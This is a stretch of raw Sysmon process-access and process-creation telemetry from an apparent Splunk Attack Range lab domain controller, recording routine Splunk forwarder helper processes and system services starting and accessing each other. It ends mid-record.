10341000x800000000000000022086Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:07.476{7901BC46-534B-6008-1706-00000000A301}15807796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022085Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:07.335{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-534B-6008-1706-00000000A301}1580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022084Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:07.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022083Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:07.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022082Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:07.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022081Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:07.335{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022080Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:07.335{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-534B-6008-1706-00000000A301}1580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022079Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:07.335{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-534B-6008-1706-00000000A301}1580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000022078Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:07.336{7901BC46-534B-6008-1706-00000000A301}1580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022102Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.585{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-534C-6008-1906-00000000A301}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022101Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.585{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022100Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.585{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022099Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.585{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022098Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.585{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022097Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.585{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-534C-6008-1906-00000000A301}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022096Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.585{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-534C-6008-1906-00000000A301}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000022095Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.587{7901BC46-534C-6008-1906-00000000A301}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022094Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.007{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-534C-6008-1806-00000000A301}4260C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022093Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.007{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022092Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.007{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022091Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.007{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022090Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.007{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022089Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.007{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-534C-6008-1806-00000000A301}4260C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022088Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.007{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-534C-6008-1806-00000000A301}4260C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000022087Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:08.008{7901BC46-534C-6008-1806-00000000A301}4260C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022119Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.945{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-534D-6008-1B06-00000000A301}7760C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022118Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.945{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022117Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:09.945{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022116Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 